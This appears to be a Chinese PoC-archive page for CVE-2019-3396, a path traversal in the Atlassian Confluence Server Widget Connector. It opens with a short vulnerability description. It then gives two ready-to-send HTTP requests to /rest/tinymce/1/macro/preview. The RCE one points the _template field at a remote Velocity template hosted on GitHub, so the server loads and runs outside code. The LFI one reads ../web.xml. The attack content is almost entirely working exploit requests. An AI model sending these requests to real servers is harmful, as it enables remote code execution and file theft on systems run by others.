关联漏洞
标题:
Atlassian Confluence Server 路径遍历漏洞
(CVE-2019-3396)
描述:Atlassian Confluence Server是澳大利亚Atlassian公司的一套专业的企业知识管理与协同软件,也可以用于构建企业WiKi。 Atlassian Confluence Server中存在安全漏洞。远程攻击者可借助Widget Connector宏利用该漏洞执行代码。以下版本受到影响:Atlassian Confluence Server 6.6.12之前版本,6.7.0版本至6.12.3之前版本,6.13.0版本至6.13.3之前版本,6.14.0版本至6.14.2之前版本。
描述
Confluence Widget Connector path traversal (CVE-2019-3396)
介绍
# CVE-2019-3396
Confluence Widget Connector path traversal (CVE-2019-3396)
RCE POC
```
POST /rest/tinymce/1/macro/preview HTTP/1.1
Host: x.x.x.x
Connection: close
Accept-Encoding: gzip, deflate
Accept: */*
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:60.0) Gecko/20100101 Firefox/60.0
Content-Type: application/json; charset=utf-8
Referer: http://x.x.x.x/pages/resumedraft.action?draftId=786457&draftShareId=056b55bc-fc4a-487b-b1e1-8f673f280c23&
Content-Length: 168
{"contentId":"786457","macro":{"name":"widget","body":"","params":{"url":"https://www.viddler.com/v/23464dc5","width":"1000","height":"1000","_template":"https://raw.githubusercontent.com/x-f1v3/CVE-2019-3396/master/1.vm"}}}
```
modified from `https://github.com/pyn3rd/CVE-2019-3396`
LFI POC
```
POST /rest/tinymce/1/macro/preview HTTP/1.1
Host: x.x.x.x
Connection: close
Accept-Encoding: gzip, deflate
Accept: */*
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:60.0) Gecko/20100101 Firefox/60.0
Content-Type: application/json; charset=utf-8
Referer: http://x.x.x.x/pages/resumedraft.action?draftId=786457&draftShareId=056b55bc-fc4a-487b-b1e1-8f673f280c23&
Content-Length: 168
{"contentId":"786457","macro":{"name":"widget","body":"","params":{"url":"https://www.viddler.com/v/23464dc5","width":"1000","height":"1000","_template":"../web.xml"}}}
```
文件快照
[4.0K] /data/pocs/197c0e8750f77d359ae446d40932876a776c0b3c
├── [ 129] 1.vm
└── [1.3K] README.md
0 directories, 2 files
备注
1. 建议优先通过来源进行访问。
2. 如果因为来源失效或无法访问,请发送邮箱到 f.jinxu#gmail.com 索取本地快照(把 # 换成 @)。
3. 神龙已为您对POC代码进行快照,为了长期维护,请考虑为本地POC付费,感谢您的支持。